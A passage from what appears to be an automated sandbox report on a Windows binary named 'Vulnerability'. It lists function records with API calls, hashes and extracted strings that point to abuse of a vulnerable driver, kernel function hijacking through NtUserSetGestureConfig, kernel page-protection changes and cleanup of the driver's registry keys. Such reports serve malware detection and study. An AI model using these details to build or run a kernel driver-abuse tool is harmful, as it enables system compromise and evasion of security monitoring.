                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@?setstate@?$basic_ios@U?$char_traits@_V01@@W@std@@@std@@_invalid_parameter_noinfo_noreturnrand$?good@ios_base@std@@CloseHandleInit@?$basic_streambuf@V12@memset$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_Osfx@?$basic_ostream@_PathTempV?$basic_streambuf@_wremovefclose
                                                                                          • String ID: [!] Error dumping shit inside the disk$[!] Failed to open file for writing$[+] Vul driver data destroyed before unlink$[<] Unloading vulnerable driver
                                                                                          • API String ID: 853663293-655004714
                                                                                          • Opcode ID: 4430f6868397d03d30fd6c8e74eb04efae2512e4c9569f4b52816f572ca90228
                                                                                          • Instruction ID: b0d6ea002379d19dd5ab9550b014d222fdb3c1f296a22cac00a1f5350663600a
                                                                                          • Opcode Fuzzy Hash: 4430f6868397d03d30fd6c8e74eb04efae2512e4c9569f4b52816f572ca90228
                                                                                          • Instruction Fuzzy Hash: 18A18462B18AC285EF04EF24E4552B8AB61EF847B8F90D132DA9D436E5DF3CD645C720
                                                                                          Function 00007FF7CC422DC0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 177registrylibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 00007FF7CC422DF5
                                                                                          • RtlInitUnicodeString.NTDLL ref: 00007FF7CC422E68
                                                                                          • RegOpenKeyW.ADVAPI32 ref: 00007FF7CC422EC6
                                                                                          • RegCloseKey.ADVAPI32 ref: 00007FF7CC422EDF
                                                                                          • GetProcAddress.KERNEL32 ref: 00007FF7CC422EEF
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A839
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A859
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A869
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A9E6
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A9ED
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A9FA
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC422F1A
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z.MSVCP140 ref: 00007FF7CC422F25
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC422F35
                                                                                          • RegDeleteTreeW.ADVAPI32 ref: 00007FF7CC422F96
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A894
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A906
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CC41A94E
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A95C
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC422F5C
                                                                                          • RegDeleteTreeW.ADVAPI32 ref: 00007FF7CC422F77
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC422FDD
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC423032
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_V01@W@std@@@std@@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@??6?$basic_ostream@_?good@ios_base@std@@?sputc@?$basic_streambuf@_DeleteTreeV01@@_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_AddressCloseHandleInitModuleOpenOsfx@?$basic_ostream@_ProcStringUnicodeV12@V21@@Vios_base@1@Vlocale@2@W@std@@
                                                                                          • String ID: "$NtUnloadDriver$SYSTEM\CurrentControlSet\Services\$[+] NtUnloadDriver Status 0x$[-] Driver Unload Failed!!$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
                                                                                          • API String ID: 2676758807-3977549460
                                                                                          • Opcode ID: ec210fed9845f0e0354979e4a28a958b067c6b393723f70e910a0d52cca556ab
                                                                                          • Instruction ID: aceee35c9c6601aea4803d815b87e30c999803a4076ef80ea39ed915724d19d3
                                                                                          • Opcode Fuzzy Hash: ec210fed9845f0e0354979e4a28a958b067c6b393723f70e910a0d52cca556ab
                                                                                          • Instruction Fuzzy Hash: E8718E62B18A8295EB10EF65E4562BCA7B1FF44BBCF808631D95D43699DF3CD249C320
                                                                                          Function 00007FF7CC416FC0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417080
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4170C0
                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41C196
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41C1BE
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@ControlD@std@@@std@@DeviceU?$char_traits@V01@@$AcquireExclusiveHandleLockModule_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: 0$ExReleaseResourceLite$NtUserSetGestureConfig$[!] Failed to find ExReleaseResourceLite$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 3251399726-2657333773
                                                                                          • Opcode ID: ca12fa7cb150998bb67f74a8a06d4b64a65faccdc0dafb2bab84ac4b28c18a35
                                                                                          • Instruction ID: 16e632fb47f9743257c11dbb20e3815dc89bfbd51e9b3484d68c5830aa63a767
                                                                                          • Opcode Fuzzy Hash: ca12fa7cb150998bb67f74a8a06d4b64a65faccdc0dafb2bab84ac4b28c18a35
                                                                                          • Instruction Fuzzy Hash: C6917072E18B8289EB10EF20E8502A9AB71FB897ACF949135D98D17755DF3CD245C320
                                                                                          Function 00007FF7CC41DE00 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DE91
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DEB4
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DF77
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DF9A
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID: PAGE$PAGELK$[!] Failed to find MmAllocateIndependentPagesEx$[!] Failed to find MmSetPageProtection$[-] Error allocating independent pages$[-] Failed to change page protections$x????xxxxxxxx????xxxxxxxxx????xxxxxxxx$xx????x???x?x????xxxxxxx????x
                                                                                          • API String ID: 3057132824-3125098887
                                                                                          • Opcode ID: fb905581844a62029b03e8b4b16e522c9344134a88a4b35d70f2d8d413b7dc7b
                                                                                          • Instruction ID: 75b06ec7e8c9cb1330d2cc2e609de2fac1efe4c8771edc8546afd882dab9772b
                                                                                          • Opcode Fuzzy Hash: fb905581844a62029b03e8b4b16e522c9344134a88a4b35d70f2d8d413b7dc7b
                                                                                          • Instruction Fuzzy Hash: 6B511B61A08BC291EA11AF15E4413A9EFA1EF847BCFD48035D98C47669EF7CE345C720
                                                                                          Function 00007FF7CC41BD20 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 129libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$EtwB$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-3808327900
                                                                                          • Opcode ID: df78221bdffc156db35b2127983c6b3e3aab9a69ab7ec58868172f2b5bd6dae9
                                                                                          • Instruction ID: 1fc71902600d2a47283d7b1b3507a243943ac516a741cd49bc943a51f587c7ae
                                                                                          • Opcode Fuzzy Hash: df78221bdffc156db35b2127983c6b3e3aab9a69ab7ec58868172f2b5bd6dae9
                                                                                          • Instruction Fuzzy Hash: CF516D72B18B8299EB10DF61E4506A9BBB5FB48798F948036DE8D13729DF3CD215C360
                                                                                          Function 00007FF7CC41B8F0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 140libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 5a0a87105d2346c2602f8f8006a18f2a622d0e1a3d3439b8cfb7f8a9fa029351
                                                                                          • Instruction ID: 9b016dfdbe3ad954f78e8cfd1a9db7c6e574d39322decd1eea9e756d8d4efe90
                                                                                          • Opcode Fuzzy Hash: 5a0a87105d2346c2602f8f8006a18f2a622d0e1a3d3439b8cfb7f8a9fa029351
                                                                                          • Instruction Fuzzy Hash: 26517F72B19B8599EB10EF60E4502ADBBB5BB4879CF948036DE8D13769DE3CD206C310
                                                                                          Function 00007FF7CC41C360 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 6f9d5f0e2b821491aa30196e6b3b59d2bc79270dfdb0c5b52757afce229e07ed
                                                                                          • Instruction ID: a8077c4d77fbd70a15456a874a881d6c87f6f90d5e42b4c11da214908f08f173
                                                                                          • Opcode Fuzzy Hash: 6f9d5f0e2b821491aa30196e6b3b59d2bc79270dfdb0c5b52757afce229e07ed
                                                                                          • Instruction Fuzzy Hash: 6D518E32B19B8599EB10DF60E8402ADBBB5BB4879CF948036DE4D53759DE3CD216C320
                                                                                          Function 00007FF7CC41B4A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 134libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 900657ba3c47b2c021ebf39136501028efa073b9903a7fe4cb49aaa2f12290b0
                                                                                          • Instruction ID: 974c1197f49280b6655b4f3f0af0ef76754538385da75a34fd7fb86fbe35a217
                                                                                          • Opcode Fuzzy Hash: 900657ba3c47b2c021ebf39136501028efa073b9903a7fe4cb49aaa2f12290b0
                                                                                          • Instruction Fuzzy Hash: 91514F76B18B8189EB10EF61E4502A9BBB5BB487ACF948136DE4D13755DF3CD21AC310
                                                                                          Function 00007FF7CC41C580 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 133libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 7749d80f8f13a42049f5b9e6e472ecae39c28f806440561e49ed27ad90016e03
                                                                                          • Instruction ID: 9ae705be449bbb0ed694a880f77dfa7d6ca9f716ef824d70bf7bd459a285cbe2
                                                                                          • Opcode Fuzzy Hash: 7749d80f8f13a42049f5b9e6e472ecae39c28f806440561e49ed27ad90016e03
                                                                                          • Instruction Fuzzy Hash: 56516C32B18B8199EB10DF60E8502A9BBB5FB487ACF948036DE4D67759DE3CD616C310
                                                                                          Function 00007FF7CC41B280 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 54a3dce36418586a9a6f77e2a7f9dca08d2ba8993b0022146bac7e6c093b9bd2
                                                                                          • Instruction ID: c34bec08ef1f3acb3db7812c51ffa3f1fbe7154595aaf9bcc6f0bb586e0d8fbf
                                                                                          • Opcode Fuzzy Hash: 54a3dce36418586a9a6f77e2a7f9dca08d2ba8993b0022146bac7e6c093b9bd2
                                                                                          • Instruction Fuzzy Hash: E6514D76B18B8189EB10EF61E4402ADBBB5BB4879CF948036DE4D13769DE3CD25AC350
                                                                                          Function 00007FF7CC41AC30 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 6674b9ca99e62bf10747288ca47ad4b80f2f326d1e31e8981f8dc3f76684e192
                                                                                          • Instruction ID: 85b2d1db55e34265e3c6c805c5e22863787b674dc8c1df67786eb360a3e486fc
                                                                                          • Opcode Fuzzy Hash: 6674b9ca99e62bf10747288ca47ad4b80f2f326d1e31e8981f8dc3f76684e192
                                                                                          • Instruction Fuzzy Hash: 9C514F36B18B8199E710EF60E4402A9BBB5BB4879CF948036DE4D13759EF3CD25AC750
                                                                                          Function 00007FF7CC41B060 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 131libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 4b9acf106bb3b219ab338e2df5011473eafeadde68a8731fcdb4d05657c6905c
                                                                                          • Instruction ID: 373399ea74c98b68310ea77aebd5134f820f13a28447e84639d1d9a4d3768fe7
                                                                                          • Opcode Fuzzy Hash: 4b9acf106bb3b219ab338e2df5011473eafeadde68a8731fcdb4d05657c6905c
